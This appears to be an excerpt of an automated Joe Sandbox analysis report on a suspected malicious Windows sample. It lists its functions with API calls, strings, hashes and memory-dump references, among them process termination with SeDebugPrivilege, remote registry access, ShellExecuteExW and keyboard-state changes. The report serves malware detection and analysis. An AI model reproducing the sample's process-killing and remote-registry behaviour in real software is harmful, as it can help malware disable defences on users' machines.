Opcode Fuzzy Hash: 614835ff346ce10ed5d9bce1e5baedc2d77adfd04c7b626e29a330337d125816
Instruction Fuzzy Hash: 295130B2A092195ADF54EB94D8919DE73BC9F08324B0044AFF605E3641EB78D7C9CB78

Function 004AEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0050DAD1,00000004,00000000,00000000), ref: 004AEAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0050DAD1,00000004,00000000,00000000), ref: 004AEB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0050DAD1,00000004,00000000,00000000), ref: 0050DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0050DAD1,00000004,00000000,00000000), ref: 0050DCF2

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: f7d78ac5f53652b3eb4805518ebc928b4979576cecc36680834d760808e34f5d
Instruction ID: 6d6a98837c0ca3f73f91805cf2add84047dd79e2ddd7765d5c355c14079e9587
Opcode Fuzzy Hash: f7d78ac5f53652b3eb4805518ebc928b4979576cecc36680834d760808e34f5d
Instruction Fuzzy Hash: 894117302056809AE735DB2A898DB7F7EB6BB73304F19480FE06746AA1C6787C45D339

Function 004CB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,004CAEF1,00000B00,?,?), ref: 004CB26C
RtlAllocateHeap.NTDLL(00000000,?,004CAEF1), ref: 004CB273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004CAEF1,00000B00,?,?), ref: 004CB288
GetCurrentProcess.KERNEL32(?,00000000,?,004CAEF1,00000B00,?,?), ref: 004CB290
DuplicateHandle.KERNEL32(00000000,?,004CAEF1,00000B00,?,?), ref: 004CB293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,004CAEF1,00000B00,?,?), ref: 004CB2A3
GetCurrentProcess.KERNEL32(004CAEF1,00000000,?,004CAEF1,00000B00,?,?), ref: 004CB2AB
DuplicateHandle.KERNEL32(00000000,?,004CAEF1,00000B00,?,?), ref: 004CB2AE
CreateThread.KERNEL32(00000000,00000000,004CB2D4,00000000,00000000,00000000), ref: 004CB2C8

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
String ID:
API String ID: 1422014791-0
Opcode ID: b05c99c5b6b34ffd1e812a6761f3b417b5a20bb78fca95775b4107dd3268fa8a
Instruction ID: 51ea7fa4ed96b0e1616118aa813bcacf85d73eb9709300d357751de0abac9c34
Opcode Fuzzy Hash: b05c99c5b6b34ffd1e812a6761f3b417b5a20bb78fca95775b4107dd3268fa8a
Instruction Fuzzy Hash: 7F01BBB5240304BFE710ABA5DC4DFAB7BACEB98711F018411FA15DB1A1CAB59804DB71

Function 004EC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 004EC49E
NULL Pointer assignment, xrefs: 004EC876, 004EC887

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: bad652e9bef712e6eeed10de7122b8a06ea9b237a105224349b33f9b28d97b88
Instruction ID: be28c17469c8a6b9e6cc454bb101a924b2a2fda5af6dd884f3e620641c916015
Opcode Fuzzy Hash: bad652e9bef712e6eeed10de7122b8a06ea9b237a105224349b33f9b28d97b88
Instruction Fuzzy Hash: 87E1E571A0025AABDF14DFA6C981AEF77B5FF48315F14402EE905A7380D778AD42CB98

Function 004F172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 004D6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004D6554
Part of subcall function 004D6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004D6564
Part of subcall function 004D6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004D65F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F179A
GetLastError.KERNEL32 ref: 004F17AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F17D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 004F1855
GetLastError.KERNEL32(00000000), ref: 004F1860
CloseHandle.KERNEL32(00000000), ref: 004F1895

Strings

SeDebugPrivilege, xrefs: 004F17B8

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 6a0fc8d43f1a91b733aace85c6bbd75790c548a7e7b2cf4dce4bdf56539981ad
Instruction ID: 1b4e7aa701cd43b0577929a056628d15eb59dc0edd229bf7df8a5a3c24b81c8b
Opcode Fuzzy Hash: 6a0fc8d43f1a91b733aace85c6bbd75790c548a7e7b2cf4dce4bdf56539981ad
Instruction Fuzzy Hash: 2841DD31600204AFDB05EF59C9A5FBEB7A1AF14314F04805EFA069F3D2DBB9A904CB59

Function 004D5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 004D58B8

Strings

blank, xrefs: 004D583A
question, xrefs: 004D5871
stop, xrefs: 004D5889
warning, xrefs: 004D58A1
info, xrefs: 004D5859

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 9f394e5d7531148c620b5b9848da50e2fd24723bbf16f71ff266d7fd1ca0ecff
Instruction ID: 630e0b7a17c3aba2a83e91389e693957bf630490d86a4f8fb0d3f1b4526c7570
Opcode Fuzzy Hash: 9f394e5d7531148c620b5b9848da50e2fd24723bbf16f71ff266d7fd1ca0ecff
Instruction Fuzzy Hash: 1C110D31709743BEEB056B559C92DFB67ACAF25318B20003BF501E6381EFA8AA11527D

Function 004DA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 004DA806

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: d9fafc56141a97eec6f81676d51041558fc37314252f9288065797225b7f0c74
Instruction ID: d1cd98160a8bbb50e49f05a24d3680297d5ac8369c9623c97281eafe351e7dbe
Opcode Fuzzy Hash: d9fafc56141a97eec6f81676d51041558fc37314252f9288065797225b7f0c74
Instruction Fuzzy Hash: ECC19D75A0020A9FDB00DF94C4A1BAEB7F4FF09314F24846BE605E7341D778A956CB9A

Function 004D6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004D6B63
LoadStringW.USER32(00000000), ref: 004D6B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004D6B80
LoadStringW.USER32(00000000), ref: 004D6B87
_wprintf.LIBCMT ref: 004D6BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004D6BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004D6BA8

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 4c2bb2531119a859e4beae60ddedade159ca906e37a01a7cc29ecc023237d13f
Instruction ID: ded84df1e84067cab1c0e9bc3cd49076128a242e6ea2be787752f0a921381d62
Opcode Fuzzy Hash: 4c2bb2531119a859e4beae60ddedade159ca906e37a01a7cc29ecc023237d13f
Instruction Fuzzy Hash: 790186F25002187FE711AB949D89EF7777CE704304F008492B746E2141EA789E889F74

Function 004F2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004F3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004F2BB5,?,?), ref: 004F3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004F2BF6

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 78758dbbd73c0d5f2bf87104501ff435a328b06048ea79a2b5fb1a79f04220f9
Instruction ID: a9e20f31435e621032e0726679e667b0fdb625a194958d9fdeaf9442bf609d14
Opcode Fuzzy Hash: 78758dbbd73c0d5f2bf87104501ff435a328b06048ea79a2b5fb1a79f04220f9
Instruction Fuzzy Hash: D591BF31204205AFCB00EF55C991B6EBBF5FF58318F04881EFA569B291DB78E905DB4A

Function 004BA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 004BA991

Part of subcall function 004B7D7C: __FF_MSGBANNER.LIBCMT ref: 004B7D91
Part of subcall function 004B7D7C: __NMSG_WRITE.LIBCMT ref: 004B7D98
Part of subcall function 004B7D7C: __malloc_crt.LIBCMT ref: 004B7DB8

__lock.LIBCMT ref: 004BA9A4
__lock.LIBCMT ref: 004BA9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00546DE0,00000018,004C5E7B,?,00000000,00000109), ref: 004BAA0C
RtlEnterCriticalSection.NTDLL(8000000C), ref: 004BAA29
RtlLeaveCriticalSection.NTDLL(8000000C), ref: 004BAA39

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 911ce18f95bc41cbd9f8011d70204d6b35af7a39caf57d2cc49b5235dfcde44c
Instruction ID: a67235fa32bdd53cd8a3030e6ee3084f94e8643e840e45f9fd04a08468df4113
Opcode Fuzzy Hash: 911ce18f95bc41cbd9f8011d70204d6b35af7a39caf57d2cc49b5235dfcde44c
Instruction Fuzzy Hash: 9D4127719003019BEB109F69DA447DDBBB0BF19329F10821EE425AB2D1D77C9865CBBA

Function 004F8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004F8EE4
GetDC.USER32(00000000), ref: 004F8EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004F8EF7
ReleaseDC.USER32(00000000,00000000), ref: 004F8F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 004F8F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004F8F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004FBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 004F8F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004F8FAA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 459ff27a87b8c40ae7bbae09fa740329061f5ee672bc3a816e90a45633233e47
Instruction ID: 9c34ec839d463b8023b6f37cb3a1310f216cd15934069ca49086372a8ee4f87e
Opcode Fuzzy Hash: 459ff27a87b8c40ae7bbae09fa740329061f5ee672bc3a816e90a45633233e47
Instruction Fuzzy Hash: 39316B72200214BFEB108F50CC4AFEB3BAAEF59715F048065FE099E291DAB99841DB74

Function 004E16DA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF

Part of subcall function 004AC6F4: _wcscpy.LIBCMT ref: 004AC717

_wcstok.LIBCMT ref: 004E184E
_wcscpy.LIBCMT ref: 004E18DD
_memset.LIBCMT ref: 004E1910

Strings

p2Tl2T, xrefs: 004E1920
X, xrefs: 004E1948

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$p2Tl2T
API String ID: 774024439-2349115295
Opcode ID: dab15e947cb8f33c45d9805a4b47ec59f0ac936cc39925a5467bf43e0c6963b5
Instruction ID: a79843ad55529a2b6f51d562b6f343124b5075284d6f76affba3dabdb1845075
Opcode Fuzzy Hash: dab15e947cb8f33c45d9805a4b47ec59f0ac936cc39925a5467bf43e0c6963b5
Instruction Fuzzy Hash: 8BC181715043409FCB14EF25C991AABBBE4BF85358F00497EF899972A1DB34ED05CB8A

Function 004E95BF Relevance: 10.7, APIs: 7, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 004E9691
WSAGetLastError.WS2_32(00000000), ref: 004E969E
__WSAFDIsSet.WS2_32(00000000,?), ref: 004E96C8
WSAGetLastError.WS2_32(00000000), ref: 004E96F8
htons.WS2_32(?), ref: 004E97AA
inet_ntoa.WS2_32(?), ref: 004E9765

Part of subcall function 004CD2FF: _strlen.LIBCMT ref: 004CD309

_strlen.LIBCMT ref: 004E9800

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: f66a89ca172cd754d3a503818dd7d85b4cbce3e7ae8a0721b46d83272b3c251d
Instruction ID: b79b320e49a7e7776ab5dda910c461a32e73eadb0573c86fe79a161156883c4c
Opcode Fuzzy Hash: f66a89ca172cd754d3a503818dd7d85b4cbce3e7ae8a0721b46d83272b3c251d
Instruction Fuzzy Hash: C6810431504240ABC710EF66CC81E6BBBA8EF95718F004A2EF455972E1EB38DD05C7AA

Function 004AAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df8826694db3e907e6575ab28c9671f889a219c6bc77af8c87ff2c0812a0a68e
Instruction ID: cf3cb40e3bb1912231ca68ee0ba40ae8ba778491c716b984d62cca26f21f905f
Opcode Fuzzy Hash: df8826694db3e907e6575ab28c9671f889a219c6bc77af8c87ff2c0812a0a68e
Instruction Fuzzy Hash: BE718F70900109EFDB08CF98CC49AEFBB74FF9A314F24854AF915A6251D334AA51CFA5

Function 004F2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004F225A
_memset.LIBCMT ref: 004F2323
ShellExecuteExW.SHELL32(?), ref: 004F2368

Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF

Part of subcall function 004AC6F4: _wcscpy.LIBCMT ref: 004AC717

CloseHandle.KERNEL32(00000000), ref: 004F242F
FreeLibrary.KERNEL32(00000000), ref: 004F243E

Strings

@, xrefs: 004F2334

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 4e1e349c778a4e1c80266994cba3c02c2a2fe0f18b5c3ffcdc2a0237e953cb06
Instruction ID: cbf02fe6fbd69ab9e2f2f648527c0d4914d4f21fe1cae057f1324c74444079b1
Opcode Fuzzy Hash: 4e1e349c778a4e1c80266994cba3c02c2a2fe0f18b5c3ffcdc2a0237e953cb06
Instruction Fuzzy Hash: F07191709006199FCF14EFA9C5819AEBBF5FF48314F10846EE955AB391CB78AD40CB98

Function 004D3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 004D3C02
GetKeyboardState.USER32(?), ref: 004D3C17
SetKeyboardState.USER32(?), ref: 004D3C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004D3CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004D3CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004D3D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004D3D26

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

